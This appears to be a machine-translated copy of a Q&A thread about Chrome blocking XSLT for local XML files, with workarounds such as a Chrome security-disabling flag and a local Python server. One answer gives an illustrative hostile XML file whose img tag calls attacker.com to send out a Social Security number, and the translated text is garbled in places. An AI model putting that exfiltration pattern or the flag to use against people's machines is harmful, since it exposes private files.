Best IT Recipes

Is it possible to make Chrome to perform XSL conversion in a local file?

I studied xslt and started testing with examples at w3schools.

However, when I save xml and xsl files in files and try to open them locally, chrome will not perform xsl conversion. It just shows a blank page.

I added the tag <?xml-stylesheet type="text/xsl" href="style.xsl"> to the XML document, and firefox displays it as it should look. Also, if I view files through a web server, chrome displays the file as it should look.

Does chrome really have a problem finding style sheet information when the link is local? Changing href to file:///C:/xsl/style.xsl made no difference.

Update: this seems to be a side effect of the security policy so as not to process the file: /// * as the same origin. As a result, the following error appears: in the console:

Unsafe attempt to load the file URL: /// C: /xsl-rpg/style.xsl from the frame with the URL file: /// C: /xsl-rpg/data.xml. Domains, protocols, and ports must match.

+68
xml google-chrome xslt local
Sep 30 '10 at 8:17
source share
5 answers

Short answer: "No, use one of the diverse set of browsers out there.

The reason this does not work is caused by the security risk that Chrome dealt with in a controversial manner [1] [2] [3] [4] blocking XML files from accessing local XSLT files in the same directory, while HTML files can access .CSS files in the same directory. / p>

In the above problems, users were asked to give a clearer error message (since the domains, protocols, and ports really match) or at least display XML without styling. Chrome developers have ignored these requests.

+55
01 Oct 2018-10-10
source share

You can do this locally using the Chrome command line flags.

Specific flag --allow-file-access-from-files

In OS X: from Terminal.app run /Applications/Google\ Chrome.app/contents/MacOS/Google\ Chrome --allow-file-access-from-files

On Windows: from the command line, run %LOCALAPPDATA%\Google\Chrome\Application\chrome.exe --allow-file-access-from-files

Note. You will probably have to close Chrome if it is currently running, otherwise Ch

+48
Apr 14
source share

If you want to stick with OP, the answer will be No (as others pointed out), but one way to fix the problem is to start a simple web server and open files via http in chrome. If you have python 2.x installed, you can start the web server by typing:

 python -m SimpleHTTPServer

Or in python 3.x:

 python3 -m http.server

and then open the file with http://localhost:8000/yourfile.xml in chrome. Hope you just want your work done, and it doesn't matter to open the file using file://

+8
Nov 19 '15 at 21:17
source share

On the Chrome Bug page, a little decryption was required - they are very interested in not explaining what the problem is and why they chose to hack everyone and not break everyone.

Suppose I have an XML file - somewhere - on my hard drive, for example:

C: \ Users \ Ian \ Documents \ Taxes \ StudioTaxReturn_2015.xml

And the malicious object - somehow - managed to delete the malicious Xml file on my computer, for example:

C: \ Users \ Jan \ AppData \ LocalLow \ Temp \ TrojanVirusWorm.xml

Imagine TrojanVirusWorm.xml contains instructions for processing style sheets ( PI ):

 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <?xml-stylesheet type="text/xsl" href="file://C:/Users/Ian/Documents/Taxes/StudioTaxReturn_2015.xml""?>

The attacker then instructs my browser to navigate to the locally stored trojanVirusWorm.xml file.

There seems to be a way in which an XML file can read the contents of an XSD file (rather than being converted using an XSD file):

 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <?xml-stylesheet type="text/xsl" href="file://C:/Users/Ian/Documents/Taxes/StudioTaxReturn_2015.xml""?> <!--And then a miracle happens, and this XML file is able to read the contents of the stylesheet xml file--> <html> <img src="http://attacker.com/UploadSocialSecurityNumber&ssn=..."></img> </html>

I do not understand how an XML file can read a stylesheet file. But the Chrome team assures us that this is dangerous and that it cannot be solved.

Every other browser has decided to do this. They decided it because it is not a problem .

+2
Dec 23 '15 at 16:26
source share

My workaround for viewing xml according to xsl file

Suppose we have some_file.xml with headers:

 <?xml version="1.0" encoding="UTF-8" ?> <?xml-stylesheet type="text/xsl" href="https://some-site.com/Common.xsl"?>
  1. We download the file https://some-site.com/Common.xsl and place it next to the some_file.xml file
  2. Change part of our header from href="https://some-site.com/Common.xsl" to href="http://localhost:8001/Common.xsl"
  3. Running into the directory with our files - python3 -m http.server 8001
  4. Open in any browser http://localhost:8001/some_file.xml
+1
Jun 27 '18 at 11:33
source share


More articles:


All Articles